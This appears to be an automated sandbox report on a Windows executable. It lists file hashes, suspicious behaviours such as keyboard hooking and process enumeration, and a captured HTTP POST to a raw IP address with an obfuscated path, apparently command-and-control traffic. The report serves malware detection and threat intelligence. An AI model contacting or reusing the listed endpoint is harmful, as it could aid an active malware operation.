Analysis

  • max time kernel
    114s
  • max time network
    133s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    17-07-2020 21:36

General

  • Target

    8e07e4ef903c87a039051bd86e891d95665b1724ecc817095edc210d4d5b6cb2.exe

  • Size

    276KB

  • MD5

    76a61cb0e25d3af7f229c2fc6f003276

  • SHA1

    edb65619f3d5331c6167d720848fee9448193952

  • SHA256

    8e07e4ef903c87a039051bd86e891d95665b1724ecc817095edc210d4d5b6cb2

  • SHA512

    94474287e94ec8aade1230a01bf7e80fd00519c7f836ae3213b05ac9c4d72ba776200d071fea81ab31511dd33c5c8fbae89ac33bf8a4db0fc275a2a220de17a7

Score
1/10

Malware Config

Signatures

  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8e07e4ef903c87a039051bd86e891d95665b1724ecc817095edc210d4d5b6cb2.exe
    "C:\Users\Admin\AppData\Local\Temp\8e07e4ef903c87a039051bd86e891d95665b1724ecc817095edc210d4d5b6cb2.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: EnumeratesProcesses
    PID:2536

Network

  • flag-unknown
    POST
    http://177.144.135.2/NAAQEVv2Fucq0UeMgJS/4dyGt/69DoPHFe7bGT4DDPm/YZXNqKPo7pRL7AI6/
    8e07e4ef903c87a039051bd86e891d95665b1724ecc817095edc210d4d5b6cb2.exe
    Remote address:
    177.144.135.2:80
    Request
    POST /NAAQEVv2Fucq0UeMgJS/4dyGt/69DoPHFe7bGT4DDPm/YZXNqKPo7pRL7AI6/ HTTP/1.1
    Referer: http://177.144.135.2/NAAQEVv2Fucq0UeMgJS/4dyGt/69DoPHFe7bGT4DDPm/YZXNqKPo7pRL7AI6/
    Content-Type: multipart/form-data; boundary=---------------------------673631834653321
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 177.144.135.2
    Content-Length: 4484
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 17 Jul 2020 21:36:43 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 132
    Connection: keep-alive
  • 177.144.135.2:80
    http://177.144.135.2/NAAQEVv2Fucq0UeMgJS/4dyGt/69DoPHFe7bGT4DDPm/YZXNqKPo7pRL7AI6/
    http
    8e07e4ef903c87a039051bd86e891d95665b1724ecc817095edc210d4d5b6cb2.exe
    5.4kB
    580 B
    10
    7

    HTTP Request

    POST http://177.144.135.2/NAAQEVv2Fucq0UeMgJS/4dyGt/69DoPHFe7bGT4DDPm/YZXNqKPo7pRL7AI6/

    HTTP Response

    200
  • 239.255.255.250:1900
    330 B
    2
  • 239.255.255.250:1900

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2536-0-0x0000000002340000-0x000000000234C000-memory.dmp

    Filesize

    48KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.